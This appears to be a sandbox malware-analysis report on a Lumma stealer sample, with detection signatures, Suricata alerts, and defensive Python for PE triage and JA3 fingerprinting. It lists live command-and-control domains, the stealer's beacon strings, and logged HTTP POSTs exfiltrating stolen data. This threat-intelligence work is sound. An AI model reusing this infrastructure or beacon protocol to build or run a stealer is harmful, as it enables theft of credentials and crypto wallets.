
Windows Analysis Report
gJkNLYV0ax.exe

Overview

General Information

Sample name: gJkNLYV0ax.exe (renamed because the original name is a hash value)
Original sample name: f158cdb34eb5c4de5eb858cce72f94cb.exe
Analysis ID: 1578918
MD5: f158cdb34eb5c4de5eb858cce72f94cb
SHA1: e93703e534ee3572c5134be5b316e1ae5feeb9c0
SHA256: 801900fc452dc3d0f333fe3be08e78406099be541daff50b7de46f4209d54c0c
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
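
Several of the static signatures above (entry point outside standard sections, section names with special characters or non-standard names, invalid PE checksum, 32-bit PE) are plain header checks, and "changes PE section rights" is the runtime counterpart of a section that is mapped writable and executable. The Python below is an added example, not Joe Sandbox's implementation and not code from the sample: it parses a PE header with nothing but struct, runs those checks, and verifies the CheckSum field with the same ones'-complement algorithm CheckSumMappedFile uses. The section-name lists, the rule that a zero CheckSum means "not set" rather than "invalid", the W+X heuristic, and the constructed test binary are this example's assumptions.

```python
import struct

# Names Windows linkers normally give the primary code section. An entry point
# outside these is the heuristic behind "Entry point lies outside standard
# sections" (assumption: this list is the example's, not Joe Sandbox's).
CODE_SECTIONS = {b".text", b"CODE", b".code", b"INIT"}
STANDARD_SECTIONS = CODE_SECTIONS | {b".data", b".rdata", b".idata", b".edata", b".pdata",
                                     b".rsrc", b".reloc", b".bss", b".tls", b".CRT", b"DATA", b"BSS"}
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Image checksum as CheckSumMappedFile computes it: ones'-complement sum of 32-bit
    words (the CheckSum field itself skipped), folded to 16 bits, plus the file length.
    checksum_offset must be 4-byte aligned, which it is in any well-formed PE."""
    total = 0
    padded = data + b"\x00" * (-len(data) % 4)
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def parse_pe(data: bytes) -> dict:
    """Minimal PE32/PE32+ header parser, just enough for the checks below."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, coff_chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint
    checksum_offset = opt + 64                                 # same offset in PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_offset)[0]
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, _, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0"), "va": va, "vsize": vsize,
                         "rawsize": rawsize, "chars": chars})
    return {"machine": machine, "coff_chars": coff_chars, "entry_rva": entry_rva,
            "checksum_offset": checksum_offset, "stored_checksum": stored, "sections": sections}


def triage(data: bytes) -> dict:
    """Static checks mirroring the report's signatures: entry point location, section
    names, writable+executable sections, and the header checksum."""
    pe = parse_pe(data)
    findings, entry_section = [], None
    for s in pe["sections"]:
        if s["va"] <= pe["entry_rva"] < s["va"] + max(s["vsize"], s["rawsize"]):
            entry_section = s["name"]
        if any(b < 0x21 or b > 0x7E for b in s["name"]):
            findings.append("section name with special chars: %r" % s["name"])
        elif s["name"] not in STANDARD_SECTIONS:
            findings.append("non-standard section name: %r" % s["name"])
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append("writable and executable section: %r" % s["name"])  # self-modifying/unpacking code
    if entry_section is None:
        findings.append("entry point outside every section")
    elif entry_section not in CODE_SECTIONS:
        findings.append("entry point outside standard code section: %r" % entry_section)
    expected = pe_checksum(data, pe["checksum_offset"])
    # Assumption: a zero CheckSum means the linker never set one, not that it is wrong.
    checksum_ok = None if pe["stored_checksum"] == 0 else pe["stored_checksum"] == expected
    if checksum_ok is False:
        findings.append("invalid PE checksum: stored 0x%08x, expected 0x%08x" % (pe["stored_checksum"], expected))
    return {"entry_section": entry_section, "checksum_ok": checksum_ok, "findings": findings}


def build_sample_pe(entry_rva: int) -> bytes:
    """Constructed 32-bit PE (not the analysed sample): .text, .rdata and a third section
    whose name starts with control bytes and which is mapped writable+executable."""
    dos = bytearray(64); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 64)
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 224, 0x0102)  # i386, EXECUTABLE_IMAGE|32BIT_MACHINE
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                       # AddressOfEntryPoint
    struct.pack_into("<IIII", opt, 28, 0x400000, 0x1000, 0x200, 0)   # ImageBase, SectionAlign, FileAlign, OS ver
    struct.pack_into("<II", opt, 56, 0x4000, 0x200)                  # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                               # Subsystem: Windows GUI
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    rx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    secs = [(b".text", 0x1000, rx), (b".rdata", 0x2000, IMAGE_SCN_MEM_READ),
            (b"\x01\x02xyz", 0x3000, rx | IMAGE_SCN_MEM_WRITE)]
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, 0x1000, va, 0x80, 0x200 + 0x80 * i, 0, 0, 0, 0, c)
                    for i, (n, va, c) in enumerate(secs))
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs).ljust(0x200, b"\0")
    return headers + b"\0" * (0x80 * len(secs))


def set_valid_checksum(data: bytes) -> bytes:
    """Write a correct CheckSum into the optional header, as a linker's /RELEASE does."""
    off = parse_pe(data)["checksum_offset"]
    out = bytearray(data)
    struct.pack_into("<I", out, off, pe_checksum(data, off))
    return bytes(out)
```

On a real file, `triage(open(path, "rb").read())` gives the same findings; a mismatching non-zero CheckSum is worth a look because a signed or Microsoft-shipped binary always carries a valid one, whereas a packer that patches the image after linking rarely recomputes it.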

Classification

  • System is w10x64
  • gJkNLYV0ax.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\gJkNLYV0ax.exe" MD5: F158CDB34EB5C4DE5EB858CCE72F94CB)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["necklacebudi.lat", "crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat", "grannyejh.lat", "sweepyribs.lat", "rapeflowwj.lat", "discokeyus.lat", "energyaffai.lat"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000000.00000003.1998585611.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: gJkNLYV0ax.exe PID: 7308 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
(3 further entries not shown in this export)
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source | Destination | Protocol
2024-12-20T16:39:19.893839+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4:49731 | 104.21.21.99:443 | TCP
2024-12-20T16:39:36.192992+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4:49734 | 104.21.21.99:443 | TCP
2024-12-20T16:39:38.571587+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4:49737 | 104.21.21.99:443 | TCP
2024-12-20T16:39:40.841707+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4:49739 | 104.21.21.99:443 | TCP
2024-12-20T16:39:43.252650+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4:49741 | 104.21.21.99:443 | TCP
2024-12-20T16:39:46.580757+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4:49742 | 104.21.21.99:443 | TCP
2024-12-20T16:39:49.456371+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4:49743 | 104.21.21.99:443 | TCP
2024-12-20T16:39:53.857296+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4:49744 | 104.21.21.99:443 | TCP
2024-12-20T16:39:34.885495+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4:49731 | 104.21.21.99:443 | TCP
2024-12-20T16:39:36.965276+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4:49734 | 104.21.21.99:443 | TCP
2024-12-20T16:39:34.885495+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4:49731 | 104.21.21.99:443 | TCP
2024-12-20T16:39:36.965276+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4:49734 | 104.21.21.99:443 | TCP
2024-12-20T16:39:19.893839+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4:49731 | 104.21.21.99:443 | TCP
2024-12-20T16:39:36.192992+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4:49734 | 104.21.21.99:443 | TCP
2024-12-20T16:39:38.571587+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4:49737 | 104.21.21.99:443 | TCP
2024-12-20T16:39:40.841707+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4:49739 | 104.21.21.99:443 | TCP
2024-12-20T16:39:43.252650+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4:49741 | 104.21.21.99:443 | TCP
2024-12-20T16:39:46.580757+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4:49742 | 104.21.21.99:443 | TCP
2024-12-20T16:39:49.456371+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4:49743 | 104.21.21.99:443 | TCP
2024-12-20T16:39:53.857296+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4:49744 | 104.21.21.99:443 | TCP
2024-12-20T16:39:18.189508+0100 | 2058360 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4:55146 | 1.1.1.1:53 | UDP
2024-12-20T16:39:18.045613+0100 | 2058364 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4:49217 | 1.1.1.1:53 | UDP
2024-12-20T16:39:17.895965+0100 | 2058378 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4:58999 | 1.1.1.1:53 | UDP
2024-12-20T16:39:49.461411+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4:49743 | 104.21.21.99:443 | TCP
2024-12-20T16:39:49.461411+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.4:49743 | 104.21.21.99:443 | TCP


                AV Detection

Source: gJkNLYV0ax.exe | Avira: detected
Source: gJkNLYV0ax.exe.7308.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["necklacebudi.lat", "crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat", "grannyejh.lat", "sweepyribs.lat", "rapeflowwj.lat", "discokeyus.lat", "energyaffai.lat"], "Build id": "PsFKDg--pablo"}
Source: gJkNLYV0ax.exe | Virustotal: Detection: 57%
Source: gJkNLYV0ax.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: gJkNLYV0ax.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: rapeflowwj.lat
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crosshuaht.lat
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: sustainskelet.lat
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: aspecteirs.lat
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: energyaffai.lat
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacebudi.lat
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: discokeyus.lat
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: grannyejh.lat
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: sweepyribs.lat
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2084875460.0000000000E61000.00000040.00000001.01000000.00000003.sdmp | String decryptor: PsFKDg--pablo
Source: gJkNLYV0ax.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Directory queried: number of queries: 1001

                Networking

Source: Network traffic | Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:49217 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.4:55146 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49731 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49741 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:58999 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49739 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49743 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49742 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49734 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49744 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49737 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49743 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49734 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.21.99:443
Source: Malware configuration extractor | URLs: necklacebudi.lat
Source: Malware configuration extractor | URLs: crosshuaht.lat
Source: Malware configuration extractor | URLs: aspecteirs.lat
Source: Malware configuration extractor | URLs: sustainskelet.lat
Source: Malware configuration extractor | URLs: grannyejh.lat
Source: Malware configuration extractor | URLs: sweepyribs.lat
Source: Malware configuration extractor | URLs: rapeflowwj.lat
Source: Malware configuration extractor | URLs: discokeyus.lat
Source: Malware configuration extractor | URLs: energyaffai.lat
Source: Joe Sandbox View | IP Address: 104.21.21.99
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.21.99:443
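
JA3 hashes the client side of the TLS handshake, so the value a0e9f5d64349fb13191bc781f81f42e1 above describes the TLS stack the sample drives rather than the server; the ET rule title only records the campaign the hash was first catalogued with, and the severity 3 reflects that the same hash is produced by every program using that stack. The Python below is an added example, not code from the report, from Joe Sandbox or from the sample: a ClientHello parser that derives the JA3 string and MD5 per the published algorithm (version, ciphers, extensions, supported groups, point formats, GREASE values dropped) and also extracts the SNI, the field rule 2058361 matches on. The ClientHello bytes are constructed here because the report does not include the sample's, so the hash this produces is not the report's value.

```python
import hashlib
import struct

# GREASE values (RFC 8701) are randomised per connection and are dropped before hashing.
GREASE = {0x0A0A + 0x1010 * i for i in range(16)}


def _u16(buf, off):
    return struct.unpack_from(">H", buf, off)[0]


def parse_client_hello(record: bytes) -> dict:
    """Parse one TLS record carrying a ClientHello and return the JA3 inputs plus the SNI."""
    if record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs = record[5:5 + _u16(record, 3)]
    if hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    version = _u16(body, 0)                      # legacy_version, 0x0303 = 771
    i = 2 + 32                                   # skip client random
    i += 1 + body[i]                             # session id
    cs_len = _u16(body, i); i += 2
    ciphers = [_u16(body, i + j) for j in range(0, cs_len, 2)]; i += cs_len
    i += 1 + body[i]                             # compression methods
    exts, curves, formats, sni = [], [], [], None
    if i < len(body):
        end = i + 2 + _u16(body, i); i += 2
        while i < end:
            etype, elen = _u16(body, i), _u16(body, i + 2)
            edata = body[i + 4:i + 4 + elen]; i += 4 + elen
            exts.append(etype)
            if etype == 0 and elen >= 5:          # server_name: list_len(2) type(1) name_len(2) name
                sni = edata[5:5 + _u16(edata, 3)].decode("ascii", "replace")
            elif etype == 10:                     # supported_groups
                curves = [_u16(edata, 2 + j) for j in range(0, _u16(edata, 0), 2)]
            elif etype == 11:                     # ec_point_formats
                formats = list(edata[1:1 + edata[0]])
    return {"version": version, "ciphers": ciphers, "extensions": exts,
            "curves": curves, "formats": formats, "sni": sni}


def ja3_string(h: dict) -> str:
    """JA3 = version,ciphers,extensions,curves,point_formats; each list '-' joined, GREASE removed."""
    def join(vals):
        return "-".join(str(v) for v in vals if v not in GREASE)
    return ",".join([str(h["version"]), join(h["ciphers"]), join(h["extensions"]),
                     join(h["curves"]), join(h["formats"])])


def ja3_hash(record: bytes) -> str:
    return hashlib.md5(ja3_string(parse_client_hello(record)).encode()).hexdigest()


def build_client_hello(ciphers, extensions) -> bytes:
    """Assemble a ClientHello record; extensions is a list of (type, body) pairs in wire order."""
    ext = b"".join(struct.pack(">HH", t, len(b)) + b for t, b in extensions)
    body = (struct.pack(">H", 0x0303) + bytes(32) + b"\x00"
            + struct.pack(">H", 2 * len(ciphers)) + b"".join(struct.pack(">H", c) for c in ciphers)
            + b"\x01\x00" + struct.pack(">H", len(ext)) + ext)
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack(">H", len(hs)) + hs


def sample_client_hello(sni: str = "discokeyus.lat", grease: int = 0x0A0A) -> bytes:
    """Constructed hello (assumption: not the sample's real one, which the report gives only as a hash).
    The grease argument stands in for the per-connection random GREASE value."""
    name = sni.encode()
    sni_body = struct.pack(">HBH", len(name) + 3, 0, len(name)) + name
    groups = b"".join(struct.pack(">H", g) for g in (grease, 0x001D, 0x0017, 0x0018))
    return build_client_hello(
        [grease, 0x1301, 0x1302, 0xC02B, 0xC02F],
        [(0x0000, sni_body),
         (0x000A, struct.pack(">H", len(groups)) + groups),
         (0x000B, b"\x01\x00"),
         (0x000D, struct.pack(">H", 4) + b"\x04\x03\x08\x04"),
         (grease, b"")])
```

Fed the first record of each flow in the pcap, `ja3_hash` reproduces what Suricata's `ja3.hash` keyword matches, and `parse_client_hello(...)["sni"]` is the value the `tls.sni` keyword in rule 2058361 sees. Treat the JA3 match as corroboration only: the SNI and the POST pattern are the evidence that tie this flow to Lumma.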
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: discokeyus.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 47 | Host: discokeyus.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=LI06XNEYW6Q | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18121 | Host: discokeyus.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=V1TMRKCAP | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8730 | Host: discokeyus.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=LVE2G100NVG | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20395 | Host: discokeyus.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=X3K3GI65MX | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1209 | Host: discokeyus.lat
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=KI1BBKSJ3B | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 570728 | Host: discokeyus.lat
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic | DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic | DNS traffic detected: DNS query: discokeyus.lat
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: discokeyus.lat
```
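
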